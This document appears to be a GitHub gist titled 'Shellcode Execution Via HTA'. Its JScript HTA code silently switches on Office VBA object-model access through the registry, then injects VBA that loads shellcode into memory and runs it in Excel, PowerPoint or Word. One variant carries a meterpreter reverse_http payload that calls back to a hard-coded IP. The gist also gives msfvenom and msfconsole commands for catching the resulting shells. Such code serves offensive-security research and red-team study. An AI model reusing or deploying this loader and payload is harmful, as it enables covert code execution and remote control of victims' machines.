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Created February 17, 2016 06:45
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Save TechByTom/ca5a0951b078d84c1774 to your computer and use it in GitHub Desktop.
Shellcode Execution Via HTA
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
strCode = '#If Vba7 Then\n'
strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n'
strCode += '#Else\n'
strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n'
strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n'
strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n'
strCode += '#EndIf\n'
strCode += '\n'
strCode += 'Sub ExecShell()\n'
strCode += ' Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n'
strCode += '#If Vba7 Then\n'
strCode += ' Dim Xlbufvetp As LongPtr\n'
strCode += '#Else\n'
strCode += ' Dim Xlbufvetp As Long\n'
strCode += '#EndIf\n'
strCode += ' Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _\n'
strCode += '139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _\n'
strCode += '13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _\n'
strCode += '116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _\n'
strCode += '214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _\n'
strCode += '36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _\n'
strCode += '139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _\n'
strCode += '235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _\n'
strCode += '224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _\n'
strCode += '187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)\n'
strCode += ' Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n'
strCode += ' For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n'
strCode += ' Wyzayxya = Hyeyhafxp(Zolde)\n'
strCode += ' Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n'
strCode += ' Next Zolde\n'
strCode += ' Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n'
strCode += 'End Sub\n'
objExcel.DisplayAlerts = false;
Thank you. You may close this window.
var objPPT = new ActiveXObject("PowerPoint.Application");
objPPT.Visible = true;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objPPT.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\PowerPoint\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objPreso = objPPT.Presentations.Add();
var pptmodule = objPreso.VBProject.VBComponents.Add(1);
strCode = '#If Vba7 Then\n'
strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n'
strCode += '#Else\n'
strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n'
strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n'
strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n'
strCode += '#EndIf\n'
strCode += '\n'
strCode += 'Public Sub ExecShell()\n'
strCode += ' Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n'
strCode += '#If Vba7 Then\n'
strCode += ' Dim Xlbufvetp As LongPtr\n'
strCode += '#Else\n'
strCode += ' Dim Xlbufvetp As Long\n'
strCode += '#EndIf\n'
strCode += ' Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _\n'
strCode += '139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _\n'
strCode += '13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _\n'
strCode += '116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _\n'
strCode += '214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _\n'
strCode += '36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _\n'
strCode += '139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _\n'
strCode += '235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _\n'
strCode += '224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _\n'
strCode += '187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)\n'
strCode += ' Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n'
strCode += ' For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n'
strCode += ' Wyzayxya = Hyeyhafxp(Zolde)\n'
strCode += ' Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n'
strCode += ' Next Zolde\n'
strCode += ' Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n'
strCode += 'End Sub\n'
objPPT.DisplayAlerts = false;
Thank you. You may close this window.
var objWord = new ActiveXObject("Word.Application");
objWord.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objWord.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Word\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objDoc = objWord.Documents.Add();
var wdmodule = objDoc.VBProject.VBComponents.Add(1);
strCode = '#If Vba7 Then\n'
strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n'
strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n'
strCode += '#Else\n'
strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n'
strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n'
strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n'
strCode += '#EndIf\n'
strCode += '\n'
strCode += 'Sub ExecShell()\n'
strCode += ' Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n'
strCode += '#If Vba7 Then\n'
strCode += ' Dim Xlbufvetp As LongPtr\n'
strCode += '#Else\n'
strCode += ' Dim Xlbufvetp As Long\n'
strCode += '#EndIf\n'
strCode += ' Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _\n'
strCode += '139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _\n'
strCode += '13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _\n'
strCode += '116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _\n'
strCode += '214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _\n'
strCode += '36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _\n'
strCode += '139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _\n'
strCode += '235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _\n'
strCode += '224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _\n'
strCode += '187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)\n'
strCode += ' Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n'
strCode += ' For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n'
strCode += ' Wyzayxya = Hyeyhafxp(Zolde)\n'
strCode += ' Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n'
strCode += ' Next Zolde\n'
strCode += ' Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n'
strCode += 'End Sub\n'
objWord.DisplayAlerts = false;
Thank you. You may close this window.
Example By Casey Smith @subTee
Generate Shellcode:
msfvenom --payload windows/meterpreter/reverse_http LHOST= LPORT=8080 --format vba > msf.vba
Wrap Shellcode in HTA
Start Msf
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LPORT 8080;set LHOST;set ExitOnSession false; exploit -j"
Wait for Shells to Rain
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
var strCode = '#If Vba7 Then\n'
strCode += ' Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Wqul As Long, ByVal Ptffs As Long, ByVal Dicgmq As LongPtr, Jvjy As Long, ByVal Tliank As Long, Qhzroqi As Long) As LongPtr\n'
strCode += ' Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gsu As Long, ByVal Mogxoelnw As Long, ByVal Cepms As Long, ByVal Ogsetm As Long) As LongPtr\n'
strCode += ' Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Xqtcnmvvo As LongPtr, ByRef Tvrhhgq As Any, ByVal Leqnxbjew As Long) As LongPtr\n'
strCode += '#Else\n'
strCode += ' Private Declare Function CreateThread Lib "kernel32" (ByVal Wqul As Long, ByVal Ptffs As Long, ByVal Dicgmq As Long, Jvjy As Long, ByVal Tliank As Long, Qhzroqi As Long) As Long\n'
strCode += ' Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gsu As Long, ByVal Mogxoelnw As Long, ByVal Cepms As Long, ByVal Ogsetm As Long) As Long\n'
strCode += ' Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Xqtcnmvvo As Long, ByRef Tvrhhgq As Any, ByVal Leqnxbjew As Long) As Long\n'
strCode += '#EndIf\n'
strCode += '\n'
strCode += 'Sub ExecShell()\n'
strCode += ' Dim Blewjd As Long, Cilsmgwg As Variant, Kqyqs As Long\n'
strCode += '#If Vba7 Then\n'
strCode += ' Dim Tttw As LongPtr, Vivgk As LongPtr\n'
strCode += '#Else\n'
strCode += ' Dim Tttw As Long, Vivgk As Long\n'
strCode += '#EndIf\n'
strCode += ' Cilsmgwg = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20,139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _\n'
strCode += '199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81,139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _\n'
strCode += '207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _\n'
strCode += '91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,110,101,116, _\n'
strCode += '0,104,119,105,110,105,84,104,76,119,38,7,255,213,49,219,83,83,83,83, _\n'
strCode += '83,104,58,86,121,167,255,213,83,83,106,3,83,83,104,144,31,0,0,232, _\n'
strCode += '29,1,0,0,47,74,67,57,118,109,110,115,117,109,111,99,71,107,81,101, _\n'
strCode += '81,85,70,65,51,68,119,74,120,106,71,112,118,51,106,89,50,107,88,57, _\n'
strCode += '121,98,65,103,77,103,69,65,116,117,81,120,49,79,86,111,97,88,105,80, _\n'
strCode += '102,83,51,69,67,54,79,114,72,71,112,100,79,76,77,108,87,103,101,111, _\n'
strCode += '89,101,109,80,82,50,85,110,57,109,55,119,74,112,107,98,66,57,105,55, _\n'
strCode += '77,95,95,120,111,57,53,99,114,101,66,79,57,68,98,117,87,110,121,70, _\n'
strCode += '114,75,119,84,118,55,80,69,108,76,114,56,76,101,83,117,82,50,50,116, _\n'
strCode += '70,108,102,85,119,110,120,55,74,107,65,114,112,50,75,122,56,83,84,70, _\n'
strCode += '87,75,78,102,52,105,111,74,45,73,89,102,102,114,113,98,57,0,80,104, _\n'
strCode += '87,137,159,198,255,213,137,198,83,104,0,2,96,132,83,83,83,87,83,86, _\n'
strCode += '104,235,85,46,59,255,213,150,106,10,95,83,83,83,83,86,104,45,6,24, _\n'
strCode += '123,255,213,133,192,117,8,79,117,237,232,75,0,0,0,106,64,104,0,16, _\n'
strCode += '0,0,104,0,0,64,0,83,104,88,164,83,229,255,213,147,83,83,137,231, _\n'
strCode += '87,104,0,32,0,0,83,86,104,18,150,137,226,255,213,133,192,116,207,139, _\n'
strCode += '7,1,195,133,192,117,229,88,195,95,232,139,255,255,255,49,57,50,46,49, _\n'
strCode += '54,56,46,53,54,46,49,48,51,0,187,240,181,162,86,106,0,83,255,213 _\n'
strCode += ')\n'
strCode += '\n'
strCode += ' Tttw = VirtualAlloc(0, UBound(Cilsmgwg), &H1000, &H40)\n'
strCode += ' For Kqyqs = LBound(Cilsmgwg) To UBound(Cilsmgwg)\n'
strCode += ' Blewjd = Cilsmgwg(Kqyqs)\n'
strCode += ' Vivgk = RtlMoveMemory(Tttw + Kqyqs, Blewjd, 1)\n'
strCode += ' Next Kqyqs\n'
strCode += ' Vivgk = CreateThread(0, 0, Tttw, 0, 0, 0)\n'
strCode += 'End Sub\n'
objExcel.DisplayAlerts = false;
//close(); //Auto Close HTA
Thanks! You May Now Close This.
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